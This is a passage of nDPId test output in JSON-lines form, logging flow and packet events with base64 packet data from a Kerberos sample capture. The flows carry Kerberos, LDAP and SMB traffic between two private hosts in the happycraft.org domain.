-02418{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1549337931211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1506,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1506,"pkt_l4_len":1472,"thread_ts_msec":1549337931211,"pkt":"AAgCHEeupB9ywglqCABFAAXUE2tAAIAGeMesEAgIrBAIyQBYwBNIHXnmqOSkjlAYAQDmlQAAAAAFqG2CBaQwggWgoAMCAQWhAwIBDaMQGw5IQVBQWUNSQUZULk9SR6QYMBagAwIBAaEPMA0bC0pPSE5TT04tUEMkpYIEOGGCBDQwggQwoAMCAQWhEBsOSEFQUFlDUkFGVC5PUkeiJzAloAMCAQqhHjAcGxpqb2huc29uLXBjJEBIQVBQWUNSQUZULk9SR6OCA+wwggPooAMCARKhAwIBAaKCA9oEggPWM37115K3Hp8wZkASHyq+pZzCB52w4ZkoKvxkfuUu0LiaHFeH\/YmBkYuC+Y2vHUb50xj2RvlJ0VUIhZ76+RSlQ21W8ccYNaNUXAdabNdF58x1VLmlxuTxbWyuhApe3nart0yE2ggJlqq+SXunnCj4pybyo3D5UqYJsd2CPwW\/UrYMlNJN1gTQgtBaL+rVhNBO6KW9AYxQ1t3V4\/aN5W98Rm9mtqvqy8JlwwSbsqtA+fkgyuLhaFI64sFXeg2okoVY+WpiV8y69YH3VrH9iOYXgjNBApUv8XW3Inwsdd+FJTBLBvDWG4tGHW9DGxqpa+jzaFQyiDi46S1MFPNG5ax\/fXZRFVyIKm5Uvcg+IVoFoTv79M+o2izKZu3xW5GT3jmX5joC1Jz2cBBvfj31IPUawr97kChTt3baVrRO5jtj4Qe\/Yf9D1ea6AnOL3m9lXfbWlkiRMtogdbiLBmz40fY6y7s2fBoNzUM7PPtzjMCZD+mzFnuxbn6SKFsq1jRXr1gfhz99U\/sj4rpgf0fGzuAji6\/CldJydoJ3ZF35EbOHxlT67B0T5Wdz2DSGMxMFnFTU2y41IZZAFsQkozjJDlJyV\/H3UNEgpsuzFWCdn70SJWivzXQmU387\/5qoLQgDt1DzqhRxVq84eAlKWowli8llAVqtdeTmpgPePJrGuN8afpBvekjwt\/1CNWyg0EdZHQFfl1jlAEsgIyCski92E8xu8mvOhuDWTPYemtkOSb2FcxtoxHDyT\/GouX7ARs1ZykSB8j3R9t9ImA7xedyZ34sFfJFGRcLyx6qpTKqFmVZRuxhX4QxBOD\/ubH8xUJ\/p2KhM0jR1yUcK5cyCfymWcxTybrHYNySjaI0gUlhRAiWvZM8bRaCC8Fvoak+VMcqFAYw\/ve5dkR7KuJ\/TxqmhnlpwuoDkayoCpyiqZLALWWLzMuA+erM0osdjgnLPkazewgaOuGK+L14eoN40NcSEI4LVjIf3MizcDep1bu4x++f34uKnDRQCxEnEkfmry2Kt7UmB9dRWUyMnIhre\/LcHyWzVYKmQzK4jbAZGQz3E7SgAtaF8YpuFzK+wN7Al3\/bnw+mNGEv8UnWesnu6eYSeTafPkSExr0eHjyMGHylq1SYGRDikN47BEUJ9DRohxwo4GIbZJ4SlXZm2o1CyYrdjxESgLw7oBxv5ojM77+mqWLxxRYcXrNOO62jI7OC10ISrQjw9VRI73l6ie75xGP23mwgzTkWksp2AmXFXEibjsoWoxN\/dqkJ1paHMQ4D49jni4b2qEd7LE7wiCkMzEEz1wg
pM028xFWhhGKaCASowggEmoAMCARKiggEdBIIBGXjHjK5feQ4HY+O2QW1CcrS7y98xjbx4G5\/F1UdYW0nRFrJ1ea7DBhGVKjGhvpNRa\/suoiAGgMaTxIusGGUQaAV3QBkZHI2P7w3S90dRv87TwzBiyLZFov6Iyju+rGIOEBeNij1u4+ieA37sl1WxkkeY5PDSqYQ0xi5dzSQDh1ZKJZF1swmboJUdCNAO5zs9II914vVd0a+gpHqPPfi\/aa\/2ENYesIfYc445XBAksieN4OCiUuXDZetEyUARPhuFnigdmrFcLiKa7lrUb+XOxw\/TpGzrNeFBj3QXNS06SOOdTL3pwlP77\/SR+78shwDam4sOlgv2UEV2H31TfNEKJs\/OC4Ks1WD8+3srLETa3NVngdje5im6AaSi"} -00735{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":29,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931210,"flow_last_seen":1549337931211,"flow_idle_time":7440000,"flow_min_l4_payload_len":1432,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":2884,"flow_avg_l4_payload_len":1442,"midstream":1,"thread_ts_msec":1549337931211,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49171,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":"johnson-pc"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":30,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931211,"flow_last_seen":1549337931211,"flow_idle_time":7440000,"flow_min_l4_payload_len":1064,"flow_max_l4_payload_len":1064,"flow_tot_l4_payload_len":1064,"flow_avg_l4_payload_len":1064,"midstream":1,"thread_ts_msec":1549337931211,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49173,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-01895{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1549337931211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1118,"pkt_l4_len":1084,"thread_ts_msec":1549337931211,"pkt":"pB9ywglqAAgCHEeuCABFAARQAIFAAIAGjTWsEAjJrBAICMAVAFjnnRKZiyMmn1AYAQD\/uwAADkhBUFBZQ1JBRlQuT1JHoicwJaADAgEKoR4wHBsaam9obnNvbi1wYyRASEFQUFlDUkFGVC5PUkejggPsMIID6KADAgESoQMCAQGiggPaBIID1jN+9deStx6fMGZAEh8qvqWcwgedsOGZKCr8ZH7lLtC4mhxXh\/2JgZGLgvmNrx1G+dMY9kb5SdFVCIWe+vkUpUNtVvHHGDWjVFwHWmzXRefMdVS5pcbk8W1sroQKXt52q7dMhNoICZaqvkl7p5wo+Kcm8qNw+VKmCbHdgj8Fv1K2DJTSTdYE0ILQWi\/q1YTQTuilvQGMUNbd1eP2jeVvfEZvZrar6svCZcMEm7KrQPn5IMri4WhSOuLBV3oNqJKFWPlqYlfMuvWB91ax\/YjmF4IzQQKVL\/F1tyJ8LHXfhSUwSwbw1huLRh1vQxsaqWvo82hUMog4uOktTBTzRuWsf312URVciCpuVL3IPiFaBaE7+\/TPqNosymbt8VuRk945l+Y6AtSc9nAQb3499SD1GsK\/e5AoU7d22la0TuY7Y+EHv2H\/Q9XmugJzi95vZV321pZIkTLaIHW4iwZs+NH2Osu7NnwaDc1DOzz7c4zAmQ\/psxZ7sW5+kihbKtY0V69YH4c\/fVP7I+K6YH9Hxs7gI4uvwpXScnaCd2Rd+RGzh8ZU+uwdE+Vnc9g0hjMTBZxU1NsuNSGWQBbEJKM4yQ5Sclfx91DRIKbLsxVgnZ+9EiVor810JlN\/O\/+aqC0IA7dQ86oUcVavOHgJSlqMJYvJZQFarXXk5qYD3jyaxrjfGn6Qb3pI8Lf9QjVsoNBHWR0BX5dY5QBLICMgrJIvdhPMbvJrzobg1kz2HprZDkm9hXMbaMRw8k\/xqLl+wEbNWcpEgfI90fbfSJgO8Xncmd+LBXyRRkXC8seqqUyqhZlWUbsYV+EMQTg\/7mx\/MVCf6dioTNI0dclHCuXMgn8plnMU8m6x2Dcko2iNIFJYUQIlr2TPG0WggvBb6GpPlTHKhQGMP73uXZEeyrif08apoZ5acLqA5GsqAqcoqmSwC1li8zLgPnqzNKLHY4Jyz5Gs3sIGjrhivi9eHqDeNDXEhCOC1YyH9zIs3A3qdW7uMfvn9+Lipw0UAsRJxJH5q8tire1JgfXUVlMjJyIa3vy3B8ls1WCpkMyuI2wGRkM9xO0oALWhfGKbhcyvsDewJd\/258PpjRhL\/FJ1nrJ7unmEnk2nz5EhMa9Hh48jBh8patUmBkQ4pDeOwRFCfQ0aIccKOBiG2SeEpV2ZtqNQsmK3Y8REoC8O6Acb+aIzO+\/pqli8cUWHF6zTjutoyOzgtdCEq0I8PVUSO95eonu+cRj9t5sIM05FpLKdgJlxVxIm47KFqMTf3apCdaWhzEOA+PY54uG9qhHeyxO8IgpDMxBM9cIKTNNvMRVoYRg="} 
-00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931211,"flow_last_seen":1549337931211,"flow_idle_time":7440000,"flow_min_l4_payload_len":242,"flow_max_l4_payload_len":242,"flow_tot_l4_payload_len":242,"flow_avg_l4_payload_len":242,"midstream":1,"thread_ts_msec":1549337931211,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49172,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00784{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1549337931211,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":296,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":296,"pkt_l4_len":262,"thread_ts_msec":1549337931211,"pkt":"pB9ywglqAAgCHEeuCABFAAEaAINAAIAGkGmsEAjJrBAICMAUAYWVZlyUeqXAF1AYAQAMZQAAADzwgZ4odBCJHRYlGGakwQrZbcEXWu9XXnYRAfBS9UWuXk5Gs8yUHN3o80HZG8YpVlAE6+3ZtDtC+pUsrywDAW4RiWhUhsRgT1sEZ7Vtb++mdY4XtnskLm1\/a8GZzwfpptF0EbEM2x6OOlhhC6IhVJD1Y8p9M\/8ToLfUByDVk8u4C3VF8fyeQ0nd00U5YKsyBV8n8IUXdemUN+fgHev0R3Z+H9FwOZZ3xgduPU1Vapfbai\/N6Y9ZMkNd8RzvF1IldwQMemLuz0F0TTbyd784T8orT0ooc+nzAjFSSfg1FeelCx\/Q2\/iHKtSIZWhWBK\/UpxM="} 
-00639{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1549337931213,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":190,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":190,"pkt_l4_len":156,"thread_ts_msec":1549337931213,"pkt":"AAgCHEeupB9ywglqCABFAACwE3FAAIAGfeWsEAgIrBAIyQBYwBWLIyaf550WwVAYAQCWAgAAAAAAhH6BgTB\/oAMCAQWhAwIBHqQRGA8yMDE5MDIwNTAzMzg0OVqlBQIDDJwypgMCAQ2pEBsOSEFQUFlDUkFGVC5PUkeqJzAloAMCAQqhHjAcGxpqb2huc29uLXBjJEBIQVBQWUNSQUZULk9SR6wZBBcwFaEDAgEDog4EDLsAAMAAAAAAAwAAAA=="} -00734{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1549337931213,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1549337931213,"pkt":"AAgCHEeupB9ywglqCABFAAD6E3RAAIAGfZisEAgIrBAIyQGFwBR6pcAXlWZdhlAYAQAZvwAAMIQAAADMAgEHYYQAAADDCgEABAAEAIeCALihgbUwgbKgAwoBAKELBgkqhkiC9xIBAgKigZ0EgZpggZcGCSqGSIb3EgECAgIAb4GHMIGEoAMCAQWhAwIBD6J4MHagAwIBEqJvBG3yZsLFskNz2Tj8maOz7vLNMVSC3wBerc1xRFPj0GLDPGT9QlZRJav62bndhsIjLkgXNAdSqCa2GR8Luxe5TgJHZoIn44Is8Ku3wpqAc9pR3m8qLfoA6VkyZzzulSM2YJ4KniKJ4c7+rlJkc3DH"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":34,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931218,"flow_last_seen":1549337931218,"flow_idle_time":7440000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1549337931218,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49175,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00640{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1549337931218,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":191,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":191,"pkt_l4_len":157,"thread_ts_msec":1549337931218,"pkt":"pB9ywglqAAgCHEeuCABFAACxAI5AAIAGkMesEAjJrBAICMAXAFhuRvAsCoQzw1AYAQDQpAAAiAqFUHJzV5J+NXZTIhoIU8GbmBSxYcQbV4PW+ckPMTgFBw0KsYU9otlYXn6Tyj5\/BmOv8b2TCLvhZTzW6Z3PoLeUqFO88\/fWi+AgP8mYvV1NNCnNorn77cmRI2eXkDk7qLKlgMm4cUN+eWFUE7G2Z1e9ZdF2LM4CSirBRuN96IFr6Z0blZRnqpw="} -00612{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1549337931219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":169,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":169,"pkt_l4_len":135,"thread_ts_msec":1549337931219,"pkt":"AAgCHEeupB9ywglqCABFAACbE31AAIAGfe6sEAgIrBAIyQBYwBcKhDl3bkbwtVAYAQD\/bQAAzmwvcX+5XppDtJZXr9PwDYLsp98Hk08TTktA1oPPxQHxyFPFFH6C9d30u8d8saioSDapQyKHHyGt004ct60erCJP9bUby12IBGHwYva7Ha2y2bxZxEn3nV+8BQON\/a2dluoxZFHPI4urPpSWS9H8dnzG6Q=="} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":36,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931219,"flow_last_seen":1549337931219,"flow_idle_time":7440000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1431,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":1431,"midstream":1,"thread_ts_msec":1549337931219,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49176,"dst_port":88,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-02396{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":36,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1549337931219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1485,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1485,"pkt_l4_len":1451,"thread_ts_msec":1549337931219,"pkt":"pB9ywglqAAgCHEeuCABFAAW\/AJNAAIAGi7SsEAjJrBAICMAYAFg1TYdzLuLg4VAYAQBQtwAAAAAFk2yCBY8wggWLoQMCAQWiAwIBDKOCBRcwggUTMIIE\/6EDAgEBooIE9gSCBPJuggTuMIIE6qADAgEFoQMCAQ6iBwMFAAAAAACjggQ0YYIEMDCCBCygAwIBBaEQGw5IQVBQWUNSQUZULk9SR6IjMCGgAwIBAqEaMBgbBmtyYnRndBsOSEFQUFlDUkFGVC5PUkejggPsMIID6KADAgESoQMCAQKiggPaBIID1hKWdXqL0IxSnZlxRjhHmIFUVS3rvb7i9fEBKrEJ5PVjDXxsAQeDmTL9wweNNg1pCQDRmZ6AE\/m2Y7TGJV\/FdJF\/GLAs\/UE5nC+H+eLE4iuLtnFkH3govXIWXOdlEsqQhROyd4qj2WtH7bxyzZwdtdBzD8HNk\/Zyhfmgmp+oA1+8nXeYYFDFKmqTt9a00HvvmTpJfi0pguIgxY8KmJbF4d1RUkWNuXZ5g7FA43R8i0OyHjh+mwSGoE1gJ\/X8DroluAfskaOHhGVguFx+famY4o8UsY6g4BojHiLERbIlzMsUYRq\/EQf2FuSw8Wc3swODADnnHqoAdpFJG5\/GMQbUUUhsHy5eDXa3\/EPT1ZKqI0bJsr7jOF5G9ytS8thT6E7bOOCcOFN4JNFsCA3bCyRL6jYH2ZedtZMr5yCI40ePAHAaIBbEPTKYDMpCUKxXExG41vrN6dY4CEFLw2Tb4BDinhxjESAIpIw6LOtdRzBrkjiFKjPEj4UBorlhX90DmWgF5dFJbZXz5eOVcZ\/qmOnm8JcuVim8byzO3C2W5go47U+8GNRvk\/iuaoCs18MAuzn4DOtJmgk1eSuxxL9sUZmjkqejNSB6Ny8aYGysoT\/tUR2mS\/10DyxEUb\/M23KvW\/d0nkBg7qCjWXvlLjMDmACl3rd8MXcyqYWqmZcwKWLk5yL3YiZbL90SxemnQHTIY+DWavybHj9SrM5+aINDzqHcDq0aHAhhwNPUOQQH+m0ab759iCYVNaTyITpTWuG6hneFvKoU9d3uSafxpBU5TJfC9PTmhW+\/db+6ouEM0JlNTrwSmfDpaJJPc+gkzn45Pl5k\/7+Abb+s6rWMNfHT+Em3MBbZJYdM0UlQ1xrel8YuJnwOOGyF4x2puehNGP\/\/\/ouwl65KT\/CBdxNVmhdbElBMgwiINySCK0GaA0G8iJuo2p3q21Z3q6PwC\/TBFuSNBvRRaLYdHeXUMMCTZUjjLBHDUqLGGPYiG40kPfZcBzP2U1v\/9gWBK4kWlSfWhwHwDob09dR24nAmYkaTEvrRnFvLOPKhepgPz5FiL+TNVO0x7Q9MEcpXED6nxJ9fgUpL+5AL+5zKjvBqGhTBSFztV5n2jwS9BN5nwKGyQXNwz7M3IugClC01JUeDu8ccEtCesL+sdsbL1EP7jcFCC1EniPRKxntY82esVy8lyQlrXBxmBdMcKVUa21imq65LZV0MJEQvFPcKWd3cpqWETjO2y3rGD5HXk8dwPDck3LvUU56PaEiLP3SNlqGRnDfEXoiRxz6YMXMhdwJ
MRbqAQJYa71fsqMLgQ4u3s5WkgZwwgZmgAwIBEqKBkQSBjoWrS7jR3\/ZxrmkklAr5M\/UVPgZBz\/I0MBRDSrLAPTWRtuq1ZhbBTvDmh4JfIoeW\/NN+j\/BIs99fVl1IARv5kJzlvsrT0oz2PdU+R8Rl10wOzwJfT7yBOJecNjJCW1XhiL9p6LojffFaim+4jvn\/X89SbhRBqPbpCCF+yHmow+h4iZkD+HM6Jz3YsaIdiuQwDqEEAgIApaIGBAQfAAAApGQwYqAHAwUAYIEAEKIQGw5IQVBQWUNSQUZULk9SR6MjMCGgAwIBAqEaMBgbBmtyYnRndBsOSEFQUFlDUkFGVC5PUkelERgPMjAzNzA5MTMwMjQ4MDVapwYCBE44s3moBTADAgES"} -00717{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931219,"flow_last_seen":1549337931219,"flow_idle_time":7440000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1431,"flow_tot_l4_payload_len":1431,"flow_avg_l4_payload_len":1431,"midstream":1,"thread_ts_msec":1549337931219,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49176,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":""}} 
-02412{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1549337931220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1498,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1498,"pkt_l4_len":1464,"thread_ts_msec":1549337931220,"pkt":"AAgCHEeupB9ywglqCABFAAXME4FAAIAGeLmsEAgIrBAIyQBYwBgu4uDhNU2NClAYAQBUPQAAAAAFoG2CBZwwggWYoAMCAQWhAwIBDaMQGw5IQVBQWUNSQUZULk9SR6QYMBagAwIBAaEPMA0bC0pPSE5TT04tUEMkpYIENGGCBDAwggQsoAMCAQWhEBsOSEFQUFlDUkFGVC5PUkeiIzAhoAMCAQKhGjAYGwZrcmJ0Z3QbDkhBUFBZQ1JBRlQuT1JHo4ID7DCCA+igAwIBEqEDAgECooID2gSCA9aIPBwtNxkshczHziSeGRCcSiSC82vdTNNxZoZEqctTILmi\/cPiWo2kj2ZowTM5BfoTzgngU5zy1dblxSYtNNDo790fqKeln68pSwduOA5ekfZ2omIpLyTKi1Uzi5unXScqqLz0hKSsn\/40+2FcuWZE3ZvPuCmZ8SKPEnuc921KBrNqOj\/0DryAdSyI8er0AkE463j84WxyAtyNQDKDrp2ez6929oR6Rx5hbvL8GdKQY9jCLD2rnICMW89Hj9rOupV1OeH78XxxB7MSKm499oGFFneF9SM8YJwXSSMV673PLXubFj6DMrikD2G0Sl6xic8MhWvEbY+QDRNnfGPZAJvMaahqCk8wVuJCt+fkFop+b4toNRK\/McSX15qS4Oue1FamxPlWb8yeZyA7zxXMdyv\/9YdFl51KW6DMdV\/gNQhWVbNsnpHVbk+dZ3hmZuA13vS+pCaVgYWcY8TsTrrqDHUdvkhYH5y6bQXhaba0hTe8Bpqjtkm6\/RTu4J\/\/NKiUQMb9AOVNXKtDTvIFCVxCzbgDhWofcnihAdfiq3GVUSfoJVIjvbiKN6rurAhxZ5G7eeGZ0k0F7hodA7NNCDg1db\/i3Z0nn0sEe0z7aNhzE0ribx16c5Vcg7SzYKcbmYr2SOlrqyDG2wBIue4c+yHf8w4ERFzFfLLBAoUF6TY9mRoNRbKB\/qSAwbDd52vGpnn87rIVg\/QNGVIwMeb1KKPfdaC4wum+6\/FhZgWd0DbrZEhIXl\/8HN6zG+3ywmGFdeC2DFCmO4dETOrfkL6fl3T\/7ku0etROu1j+k26SXEG6Gge01yPUKju51MrjdtHnDZ1Ss42MB0XlUT6U6S5TlEIP\/8k9d0krm1cn0oRERln+NBIaJS\/B2711LZddv4tje7ItSqfXLacjoI7g80JWdXjf4l7SPcZiNeEbp1dMmXrQFZcbRN17kosEr4Tm2W4friYde8+zbAKqoXvVJXbnxAUwEVAGcV\/iPptIl\/xW9mtB0WPhDmkKXm2SfL9rih8OBbowoKkOmIJqQw8CRJRncVK0szyJok+ajlBHDiJgpcZUT8EmfmEr0qJ0qoMeuCqxs8Kf3IstAtgMR7lMBZda98WMq0J06Prxf9X\/7Sw5XHFF0Ihx2VyWiVN3DmzgADoDdivNlyaD8+Octjfvk+ZwiZGCsRMD1d7AL6HjQzrju4nysDHJIjeaKR52nWtCWAZ87qog1mDH+qjQPdMGkDr1FGrVbBXAZcR0K17tOKTw9bgQg9LvLMWeDMDNCEwvA8GHdr\/fAsBPK3PDKVyht8oNdhjar8x
KOZRvwzCOpoIBJjCCASKgAwIBEqKCARkEggEVYp6jTcDi\/gYVd9SDuEsi2VccBape1lXgcuGoeWG1ePxV5NidfJvDEi3F2VmdD04JFUaFb\/GRqNe9F8xWyy86xiJ3eKyJgAfyG7DDQnnFCeKC++4ORaBUkKnIeWwsFqQxh0aL1BrdknGP8u06G6P95r9esj7jUPDXQ1D0+jbs1WpWssKqZMQfUgV0eg9FoEGdVPsUmgNbZN2YPPrxhZ6CEgNOIC\/5aj8NqGMkPPX6xfYF4tbD74dZ3EfC4ry5KcIxNVYXU179as2C\/cihpEMrX8yiZtM91awDzQYUMPKt3\/3WSS96ycQo00pex7Pc1Jh3j49Cr5ckyWXD9SUXbCcOpUpip4\/Jz5Hvsliozjm5inKwUIBTJQ=="} -00735{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":37,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1549337931219,"flow_last_seen":1549337931220,"flow_idle_time":7440000,"flow_min_l4_payload_len":1431,"flow_max_l4_payload_len":1444,"flow_tot_l4_payload_len":2875,"flow_avg_l4_payload_len":1437,"midstream":1,"thread_ts_msec":1549337931220,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49176,"dst_port":88,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Kerberos","breed":"Acceptable","category":"Network"},"kerberos": {"hostname":"","domain":"happycraft.org","username":"johnson-pc"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":38,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337931220,"flow_last_seen":1549337931220,"flow_idle_time":7440000,"flow_min_l4_payload_len":227,"flow_max_l4_payload_len":227,"flow_tot_l4_payload_len":227,"flow_avg_l4_payload_len":227,"midstream":1,"thread_ts_msec":1549337931220,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49174,"dst_port":445,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00767{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":38,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1549337931220,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":281,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":281,"pkt_l4_len":247,"thread_ts_msec":1549337931220,"pkt":"pB9ywglqAAgCHEeuCABFAAELAJhAAIAGkGOsEAjJrBAICMAWAb2ZMOb++YgxIFAYAP+McAAAQFskZ7b1ZYO5\/CuVOTe3ZqHs3nhqe1KXhnlBtJ\/qDgyo+sduQpC\/WLkmAdUvTJdV+CtGiwLoGf3Uio50ZE6gilnFEbzLLhzMIw4gwhRvlYwapNctw4G2EkpKfWO1MgMQ0yTGVxtfwAuP0ouYkDi\/6FI97AzDGvp\/R2LK19PAI403fVWk1Cbb2O\/YPOGH5a8hHowuR6tT8UugHDdGGl\/fWl8Wk4rCdi\/3gOYAhRVI6o2ZOHpv4GeBlLgJ6L2WL35O3jhh2e2dr0Fkd\/WG3ET2QLw9x3WRfncFn29f8nOqAUQDRH0="} -00809{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":2,"flow_last_seen":1549337931221,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":314,"pkt_l4_len":280,"thread_ts_msec":1549337931221,"pkt":"AAgCHEeupB9ywglqCABFAAEsE4VAAIAGfVWsEAgIrBAIyQG9wBb5iDEgmTDn4VAYAP9zWgAAAAABAP5TTUJAAAEAAAAAAAEAHwAJAAAAAAAAAAEAAAAAAAAA\/\/4AAAAAAABdAAAAAAQAAPvWvNgjH\/I48OPxOa5H7a4JAAAASAC4AKGBtTCBsqADCgEAoQsGCSqGSIL3EgECAqKBnQSBmmCBlwYJKoZIhvcSAQICAgBvgYcwgYSgAwIBBaEDAgEPongwdqADAgESom8EbUswX\/mwh6g2ztwHi8\/dTRtvFzo0LVENq7tttT0JwVpKoIxijjsysss5HuCbI3DQGU7C0ILmrl+8phtVtu+2vBMSA9FKWe75R\/a+ST6oEaoDrDjzWfPqdU4xUCgD\/zK6J0O4Dsk+rO8nhy4LUmk="} 
-00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"kerberos.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1549337937690,"flow_last_seen":1549337937690,"flow_idle_time":7440000,"flow_min_l4_payload_len":266,"flow_max_l4_payload_len":266,"flow_tot_l4_payload_len":266,"flow_avg_l4_payload_len":266,"midstream":1,"thread_ts_msec":1549337937690,"l3_proto":"ip4","src_ip":"172.16.8.201","dst_ip":"172.16.8.8","src_port":49179,"dst_port":389,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 